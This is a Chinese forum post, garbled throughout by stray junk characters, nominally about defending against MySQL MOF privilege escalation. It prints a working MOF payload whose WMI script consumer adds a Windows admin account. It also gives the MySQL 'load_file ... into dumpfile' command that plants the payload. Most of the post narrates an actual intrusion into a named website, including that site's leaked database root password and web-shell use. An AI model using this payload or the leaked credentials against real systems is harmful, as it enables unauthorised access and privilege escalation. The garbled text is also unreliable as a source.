Mysql mof扩展漏洞防范方法
. B6 X* f* _" h2 M/ `
2 n7 f$ u: T. @* A( d, z网上公开的一些利用代码:
_ T6 ?( K: G4 p
. K& ~# D5 S& j* t% ^#pragma namespace(“\\\\.\\root\\subscription”)/ X; |+ P* g3 W- v5 a% X* A$ F" }- t
9 ]" h0 Y" [* T$ \instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
3 E8 [+ C _4 _7 V5 |# Y1 h; a- \9 }+ n% u- b. e+ G: u- ~
+ n+ }9 L5 w7 i0 P& Q
2 z* k& g5 \8 A! C
, e/ H6 Y+ f1 ^
h" E6 q9 E- V$ e, ]( X) X连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
; U& L) H: n$ q. e% W' y从上面代码来看得出解决办法:- u+ j. b" S3 ~+ f" J: F
; |- G1 p- X+ B/ {1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数% B) W; U7 Z8 v v
' G, o1 P+ y- E7 }6 u. c$ [
2、禁止使用”WScript.Shel”组件
~( w$ x4 N" L1 Q
$ R3 q6 B6 L: X7 { k3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER3 s5 W3 y/ w/ R) Q" _
$ W/ ^3 V f2 I/ ]. f! z
当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下
# {/ {1 y7 D: X; Q' h% e
7 E+ s$ L4 d" ?( r! }+ j/ L事情是这样发生的 一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权
8 D9 P2 K6 Q/ r
8 X4 H2 v, t; ~# ~. _" }* _但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容
0 S1 x+ W1 d6 B7 C4 R- \' V
* @2 z( d; f5 q; ~* }6 ^看懂了后就开始练手吧
, W6 ?# N7 I" K7 e: \- x/ T) m8 Y8 l' f8 g: K/ L3 c5 X; N8 x
http://www.webbmw.com/config/config_ucenter.php 一句话 a1 ?, d' N( N; Q+ A8 v
) n0 Y# |- H( p5 X% c6 n; R8 Q2 q$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。9 r- i3 [: x# G% h( g
; S0 B" Y8 k* c2 _9 n5 m1 P于是直接用菜刀开搞% L. \4 q) ^6 A) w4 N
! V) `/ _4 X! M! y1 A
上马先
& ^# g! ^3 H: b4 M
' N% o ^5 i+ ~) T既然有了那些账号 之类的 于是我们就执行吧…….
! P5 U9 }2 W) V' B' |2 A( h' J, j6 m, d$ N: s3 {' M; S
小小的说下% e( z% w+ r9 `
. L2 s/ m3 w1 D0 V: ] z6 o
在这里第1次执行未成功 原因未知
1 x. F4 g4 A8 P2 `4 l7 f) V; x+ T( R% ?; Z
我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。4 [3 L8 g% `. I6 A F
$ w& A; W; L3 Z" p! H$ B#pragma namespace(“\\\\.\\root\\subscription”); n0 `( C( [( M+ i+ ^6 z. d9 h, u
4 b& M2 Q& X' Finstance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };, Y7 m7 g2 I: d. W2 ~/ w1 w G
5 p% J7 r+ @1 e5 Q- V0 V9 c
我是将文件放到C:\WINDOWS\temp\1.mof
' |" Y. i) W- x/ k1 L& n+ p& O
/ m1 C' n, }, F. @# n( c; g: u所以我们就改下执行的代码/ j: F3 l7 Q9 u3 n0 V+ y! a
# s. [- g7 z9 @! i g. X8 Gselect load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
( b! V% ^5 G# e. {- h e2 Y9 k% z
2 a6 m$ a* Z# k; @7 Q- f6 ^ P! z" x/ L2 p" e
2 U' n3 i3 K# j0 H& H
但是 你会发现账号还是没有躺在那里。。 m& k& k7 S: s8 z
5 k N7 v8 k2 [" H+ c+ S; X$ _
于是我就感觉蛋疼 I/ ~- ~) C5 \4 `" U' B
4 a* S9 z+ N) O- O& ~0 `$ Q( o就去一个一个去执行 但是执行到第2个 mysql时就成功了………1 R9 U" X: a; {: v
- Q( I3 Z; ?8 o" u0 F: X1 o: N; U" E" p: k5 ~- E
5 L/ N6 z2 o# q7 o9 ]6 Y/ h0 W2 y
但是其他库均不成功…" i7 _/ p# Y7 O: C) r( s% K
) V; s! Y1 E' y
我就很费解呀 到底为什么不成功求大牛解答…
+ @) x6 U+ X/ u3 C$ r: F# d
9 A+ {8 c+ ?6 J# f3 J5 H6 I, j7 a: y% B
" J1 t; f/ w+ q& g y5 x0 q
|
发表于 2013-1-4 19:49:49
收藏
支持
反对